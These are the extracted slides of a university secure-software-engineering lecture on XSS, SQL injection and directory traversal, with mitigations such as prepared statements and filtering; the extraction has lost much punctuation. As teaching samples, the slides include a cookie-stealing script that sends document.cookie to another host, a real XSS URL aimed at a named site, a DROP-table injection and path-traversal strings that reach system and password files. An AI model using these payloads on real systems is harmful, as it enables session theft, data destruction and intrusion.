Secure Software Engineering: Input Vulnerabilities

1
Secure Software Engineering Input
Vulnerabilities

• CPSC 410

2
Input Vulnerabilities

• We all know not to run code retrieved from
  suspicious places
• But passive data may be
• interpreted as malicious instructions
• System.out.println(/etc/password)
• vs.
• File file new File(/etc/password)

3
3 Most Common Input Vulnerabilities on Web

• 1. Cross-site Scripting
• 2. SQL Injection
• 3. Directory Traversal
• See http//www.owasp.com - the Open Web App
  Security Project

4
Cross Site Scripting

• Web browsers should only execute JavaScript from
  sites that you visit
• But Web sites often echo values given as input,
  e.g.
• Input http//www.foo.com?usernameEric
• Output page Hello Eric
• If we put JavaScript into an input, an output
  page could include that JavaScript!
• The tester must assume every data entry point is
  a possible XSS hole.

5
Example Invectus on Macdonalds
http//www.mcdonalds.com/content/us/en/search/sear
ch_results.html?queryText223E3Cimg20src22ht
tp//i55.tinypic.com/witu7d.png2220height22650
2220width221000223E
http//www.mcdonalds.com/content/us/en/search/sear
ch_results.html?
queryText223E3Cimg20src22http//i55.tinypic
.com/witu7d.png2220height226502220width221
000223E
queryTextgtltimg srchttp//i55.tinypic.com/witu7
d.png height650? width1000?gt
Sourcehttp//www.acunetix.com/blog/news/full-disc
losure-high-profile-websites-xss/
6
(No Transcript)
7
Malicious Script Input

• Basic example (assume URL encoding)
• http//www.foo.com?usernameltscriptgtalert(Hello
  World)lt/scriptgt
• Steal users cookies
• ltscript type'text/javascript'gt
• var img document.createElement('img')
• img.setAttribute('src', http//localhost8080?co
  ok' escape(document.cookie))
• document.body.appendChild(img)
• lt/scriptgt

8
GWT vulnerabilities

• JavaScript on your host page that is unrelated to
  GWT
• Code you write that sets innerHTML on GWT Widget
  objects
• Using the JSON API to parse untrusted strings
  (which ultimately calls JavaScript's eval
  function)
• JavaScript Native Interface (JSNI) code that you
  write that does something unsafe (such as setting
  innerHTML, calling eval, writing directly to the
  document via document.write, etc.)

Src https//developers.google.com/web-toolkit/art
icles/security_for_gwt_applicationsxss
9
InnerHTML example
lthtmlgt ltheadgt ltscript language"JavaScript"gt
function fillMyDiv(newContent)
document.getElementById('mydiv').innerHTML
newContent lt/scriptgt lt/headgt ltbodygt
ltpgtSome text before mydiv.lt/pgt ltdiv
id"mydiv"gtlt/divgt ltpgtSome text after
mydiv.lt/pgt lt/bodygt lt/htmlgt
10
GWT Guidelines

• Carefully inspect and strip or escape any strings
  you assign to innerHTML using GWT code
• Carefully inspect any JavaScript strings you pass
  to GWT's JSON parser
• Carefully inspect any strings you pass to eval or
  assign to innerHTML via a JSNI method
• Take care in your native JSNI methods to not do
  anything that would expose you to attacks

11
Cross Site Scripting
12
Famous Examples

• Obama website redirected to Hillary Clinton
• Twitter Pop-Ups
• Invectus attacks (over 20 sites)

13
Best Solution

• Filter any data which is echod back to HTML
• e.g.
• http//josephoconnell.com/java/xss-html-filter/
• String input request.getParameter(data)
• String clean new HTMLInputFilter().filter(
  input )

14
Simple Web App

• A Web form that allows the user to look up
  account details
• Underneath a Java Web application serving the
  requests

15
SQL Injection Example

• Happy-go-lucky SQL statement
• Leads to SQL injection
• One of the most common Web application
  vulnerabilities caused by lack of input
  validation
• But how?
• Typical way to construct a SQL query using string
  concatenation
• Looks benign on the surface
• But lets play with it a bit more

String query SELECT Username, UserID, Password
FROM Users WHERE
username user AND password
password
16
Injecting Malicious Data (1)
Press Submit
query SELECT Username, UserID,
Password FROM Users WHERE Username
'bob' AND Password
17
Injecting Malicious Data (2)
Press Submit
query SELECT Username, UserID, Password
FROM Users WHERE Username 'bob-- AND
Password
18
Injecting Malicious Data (3)
Press Submit
query SELECT Username, UserID, Password
FROM Users WHERE Username 'bob DROP
Users-- AND Password
19
Heart of the Issue Tainted Input Data
SQL injections
application
database
evil
Web App
hacker
input
evil
input
output
browser
cross-site scripting
Insert input checking!
20
Bobby Tables
http//xkcd.com/327/
21
Mitigating SQL Injection

• Always use Prepared Statements or Stored
  Procedures
• Instead of
• stmt.execute(
• "UPDATE EMPLOYEES SET SALARY input1 WHERE
  ID input2
• )
• Use
• PreparedStatement pstmt conn.prepareStatement(
• "UPDATE EMPLOYEES SET SALARY ? WHERE ID ?
• )
• pstmt.setBigDecimal(1, input1)
• pstmt.setInt(2, input2)
• The account used to make the database connection
  must have Least privilege. If the application
  only requires read access then the account must
  be given read access only.
• Avoid disclosing error information Weak error
  handling is a great way for an attacker to
  profile SQL injection attacks.

22
SQL injection on GWT

• More a vulnerability of the RPC services
• Could send arbitrary data to your datastore (once
  the Javascript is de-obfuscated)
• Also possible to do JDOQL injection
• Use Query object and parameters instead of String
  syntax

Query query pm.newQuery(Employee.class) query.s
etFilter("lastName lastNameParam") query.setOr
dering("hireDate desc") query.declareParameters("
String lastNameParam") ListltEmployeegt results
(ListltEmployeegt) query.execute("Smith") query.c
loseAll()
23
Recent Examples

• On March 27, 2011 mysql.com, the official
  homepage for MySQL, was compromised
• On June 1, 2011, LulzSec steal information from
  Sony PS3 users
• In August, 2011, Hacker Steals User Records From
  Nokia Developer Site

24
Directory/Path Traversal

• Occurs when user input is used to create the path
  for reading a file on disk
• http//myblog.com/view?photoeric.jpg
• String file request.getParameter(photo)
• new File(/images/ file)

See https//www.owasp.org/index.php/Path_Traversal
25
Directory Traversal

• Malicious input
• http//myblog.com/view?photo../../../../../Window
  s/system.ini
• Has been used to retrieve
• web.xml files
• Apache conf files
• UNIX password files
• Other example
• You let user choose between different style
  templates and save the template filename in their
  profile

26
Example 2

• http//some_site.com.br/get-files.jsp?filereport
  .pdf
• http//some_site.com.br/get-page.php?homeaaa.htm
  l
• In these examples its possible to insert a
  malicious string as the variable parameter to
  access files located outside the web publish
  directory.
• http//some_site.com.br/get-files?file../../../
  ../some dir/some file
• http//some_site.com.br/../../../../some
  dir/some file

27
Best Solution

• Dont construct file paths from user input
• Understand how your web server handles file
  access.
• Create a UUID (Universally Unique IDentifier)
• for each file and save as a column with data
• uuid UUID.randomUUID().toString()
• File savedFile File(uuid)
• Example database table for images

picID picName picDesc picOwner picFormat uuid
28
2 Rules to Remember

• Always assume many users are malicious and want
  to break your software
• Dont assume a Web site is always accessed
  through a normal Web Browser
• Famous last words, I wrote the JavaScript so
  that this would never happen